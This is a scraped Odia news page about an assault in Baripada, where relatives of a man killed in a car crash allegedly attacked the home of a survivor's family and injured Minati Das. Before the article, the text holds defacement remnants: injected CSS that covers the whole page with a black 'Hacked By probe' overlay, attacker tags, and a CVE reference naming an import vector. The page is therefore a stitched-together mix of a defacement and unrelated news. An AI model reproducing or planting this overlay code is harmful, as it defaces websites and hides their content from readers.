html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMPKQR04E4X
`58; Hacked By probe `68;
[ HXIMPkqr04e4x ]
HXIMPkqr04e4x
CVE-2026-49049 | import vector

ଘରେ ପଶି ମହିଳାଙ୍କୁ ମରଣାନ୍ତକ ଆକ୍ରମଣ 

User Rating: 0 / 5

Star InactiveStar InactiveStar InactiveStar InactiveStar Inactive
 

ଗତମାସରେ ବାଲେଶ୍ୱର ବିର୍ଲା ଟାୟାର ନିକଟରେ ଘଟିଥିବା ଦୁର୍ଘଟଣାରେ ପ୍ରାଣ ହରାଇଥିବା ଜଣେ ଯୁବକଙ୍କ ଭାଇ ବର୍ତ୍ତି ଯାଇଥିବା ଯୁବକଙ୍କୁ ଦାୟୀ କରି ହୋଇଛି ଆକ୍ରମଣ

ବାରିପଦା, / ଦିଲ୍ଲୀପ ମହାନ୍ତି :- ଗତ ମାସ ୧୪ ତାରିଖ ବିଳମ୍ବିତ ରାତିରେ ବାଲେଶ୍ଵର ବିର୍ଲା ଟାୟାର ନିକଟସ୍ଥ ଓଭରବ୍ରିଜ ନିକଟରେ ହୋଇଥିବା ଏକ କାର ଦୁର୍ଘଟଣାରେ ତିନି ଜଣ ଯୁବକଙ୍କ ମୃତ୍ୟ ହୋଇଥିବା ବେଳେ ଦୁଇ ଜଣ ଅଳ୍ପକେ ବର୍ତ୍ତି ଯାଇଥିଲେ। ଘଟଣାର ୨୦ ଦିନ ପରେ କାର ଦୁର୍ଘଟଣାରେ ମୃତ୍ୟୁବରଣ କରିଥିବା ସ୍ୱର୍ଗତ ସନ୍ତୋଷ ପଣ୍ଡାଙ୍କ ଭାଇ ନିଜ ଭାଇର ମୃତ୍ୟ ପାଇଁ କାର ଦୁର୍ଘଟଣାରୁ ବର୍ତ୍ତି ଯାଇଥିବା ଅନ୍ୟ ଦୁଇ ଜଣଙ୍କ ପରିବାରବର୍ଗଙ୍କୁ ଦାୟୀ କରି ଗତକାଲି ମରଣାନ୍ତକ ଆକ୍ରମଣ କରିଥିବା ଅଭିଯୋଗ ହୋଇଛି। ମୃତକ ଶ୍ରୀ ପଣ୍ଡା ଙ୍କ ତିନି ଭାଇ ଓ ସମ୍ପର୍କୀୟମାନେ ଶରତ  କୁମାର ଦାଶ ଙ୍କ ଘରେ ପଶି  ଭଙ୍ଗାରୁଜା କରିବା ସହ ତାଙ୍କ ସ୍ତ୍ରୀ ମିନତୀ ଦାଶଙ୍କୁ ମରଣାନ୍ତକ ଆକ୍ରମଣ କରିବା ସହ ହତ୍ୟା ଧମକ ଦେଇଥିବା ବାରିପଦା ଟାଉନ ଥାନାରେ ଅଭିଯୋଗ ହୋଇଛି। ଏହି ଆକ୍ରମଣରେ ଆହତ ହୋଇ ମିନତୀ ଦାଶ ଏବେ ପିଆରଏମ୍ ମେଡ଼ିକାଲ କଲେଜ ଏଣ୍ଡ ହସ୍ପିଟାଲରେ ଚିକିତ୍ସିତ ହେଉଛନ୍ତି। ଉଲ୍ଲେଖଯୋଗ୍ୟ ଯେ ଉକ୍ତ ମର୍ମନ୍ତୁଦ ସଡ଼କ ଦୁର୍ଘଟଣା ରେ ତିନି ଜଣ ଯୁବକ ଅକାଳରେ ପ୍ରାଣ ହରାଇଥିଲେ। ତେବେ ମୃତ୍ୟୁର ଏତେଦିନ ପରେ ଦୁର୍ଘଟଣା ପାଇଁ ଦାୟୀ କରି ବଂଚିଯାଇଥିବା ଦୁଇ ଯୁବକଙ୍କ ପରିବାର ଉପରେ ଆକ୍ରମଣ ହେବାକୁ ନେଇ ସାଧାରଣରେ ଚର୍ଚ୍ଚା ହେଉଛି। ଏହି ଘଟଣାକୁ ନେଇ ଉଭୟ ପକ୍ଷରୁ ଏତଲା ହୋଇଥିବା ପୁଲିସ ସୂତ୍ରରୁ ପ୍ରକାଶ। ମାମଲା ତଦନ୍ତାଧିନ ରହିଛି।

0
0
0
s2sdefault